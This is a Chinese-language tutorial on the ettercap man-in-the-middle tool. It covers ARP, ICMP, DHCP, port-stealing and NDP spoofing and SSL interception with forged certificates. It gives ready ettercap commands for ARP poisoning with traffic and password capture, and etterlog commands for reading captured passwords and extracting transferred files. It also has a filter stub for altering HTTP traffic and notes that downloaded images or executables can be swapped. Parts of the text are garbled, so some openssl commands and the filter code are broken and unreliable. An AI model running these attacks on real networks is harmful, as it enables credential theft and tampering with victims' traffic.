中间⼈攻击⼯具ettercap
中间⼈攻击⼯具ettercap
(⼀).简介
(⼆).模块划分
1.Snifer
2.MITM
3.Filter
4.Log
5.Plugin
(三).特性
(四).⽤户操作界⾯
(五).指定⽬标
(六)权限
(七)基于伪造证书的SSL MITIM
(⼋).ARP 中间⼈攻击
(九).Ettercap ⽇志查看
(⼗).Filter
(⼗⼀).替换HTTP内容
⼗⼆).其他欺骗攻击
(⼀).简介
ettercap是linux下⼀个强⼤的欺骗⼯具,当然windows也能⽤
是⼀个统⼀的中间⼈攻击⼯具
转发 MAC 与本机相同,但 IP 与本机不同的数据包
⽀持 SSH1、SSL 中间⼈攻击
(⼆).模块划分
1.Snifer
负责数据包转发
  1.Unified
    1.单⽹卡情况下独⽴完成三层包转发
    2.始终禁⽤内核 ip_forward 功能
  2.Bridge
    1.双⽹卡情况下的⼀层 MITM 模式
    2.可作为 IPS 过滤数据包
    3.不可在⽹关上使⽤(透明⽹桥)
2.MITM
1.把流量重定向到 ettercap 主机上
2.可以使⽤其他⼯具实现 MITM,ettercap 只作嗅探和过滤使⽤
3.实现MITM的⽅法
  1.ARP
  2.ICMP
    1.ICMP路由重定向,半双⼯
  3.DHCP
    1.修改⽹关地址,半双⼯
  4.Switch Port Stealing
    1.flood⽬标地址是本机,源地址是受害者的包
    2.适⽤于ARP静态绑定的环境
  5.NDP
    1.IPv6协议欺骗技术
3.Filter
4.Log
5.Plugin
(三).特性
2.4以上内核对ARP地址欺骗的约束
收到⾮请求的 ARP 响应包,不更新本地 ARP 缓存Ettercap 使⽤ARP request 包进⾏攻击
Solaris 不根据ARP包更新本地ARP缓存
ssh工具windowsEttercap 使⽤先发 ICMP 包来更新 ARP 缓存
(四).⽤户操作界⾯
-T ⽂本界⾯
-G 界⾯图形
-C 基于⽂本的图形界⾯
-D 后台模式
(五).指定⽬标
指定命令的两种格式:
IPv4:MAC/IPs/Ports
IPv6:MAC/IPs/IPv6/Ports
等⼀下会具体演⽰
(6)权限
1.需要root权限打开链路层Socket连接,然后使⽤nobody账号运⾏
2.⽇志写⼊⽬录需要nobody有写⼊权
3.修改/etc/f⽂件
ec_uid =65534
ec_uid=65534
(七)基于伪造证书的SSL MITIM
注意:Bridge模式不⽀持SSL MITM
应⽤实例:
openssl genrsa -out 1024
openssl req ?new? ?out tmp.csr
openssl x509 ?req ?days 1825 ?in tmp.csr ?signkey
-w
w>>
rm -wtmp.csr
(⼋).ARP 中间⼈攻击
1.字符模式(arp 欺骗)
ettercap -i eth0 -T -M arp -q /10.10.10.2// /10.10.10.133// -w a.cap -l loginfo -L logall -m message
参数 -w 将⽹络通信过程保存
  -l 保存⽇志
  -L 保存⽇志
这些信息⾥可能就有最重要的信息
2.图形界⾯
4.DNS欺骗与SSL拒绝攻击
(九).Ettercap ⽇志查看
etterlog -i 查看获取的密码
etterlog -p 查看 Log中的连接
etterlog -c -f /1.1.1.1/ p
etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:p > aa 选择相应的连接并榨取⽂件
注意:这⾥我们知道20端⼝是传输数据的,,如果我们看到有从20⾛的流量,可能是⼀个有⽤的数据。
(⼗).Filter
1所有filter的⽂件的位置: /usr/share/ettercap/
/ SSH-1.99 / SSH-1.51
  1.SSH-1.99 代表兼容 ssh-2 和ssh1,可以使⽤ Filter 来只使⽤ ssh-1,利于监听
3使⽤
(⼗⼀).替换HTTP内容
if (ip.proto == TCP && tcp.src == 80)
{
msg(“data on TCP 80\n”);
你可以替换⽹页的图⽚,也可以替换exe程序,只要是传输过程中的数据,理论都是可以替换的。
(⼗⼆).其他欺骗⽅法
1.ICMP
ettercap -i eth0 -T -M icmp:00:11:22:33:44:55/10.0.0.1(真实⽹关的MAC/IP)
2.DHCP
ettercap -i eth0 -T -M dhcp:192.168.0.30,35,50?60/255.255.255.0/192.168.0.1(DNS)3.Port
ettercap -i eth0 -T -M port /1.1.1.1/ /1.1.1.2/
4.Ndp
ettercap -i eth0 -T -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/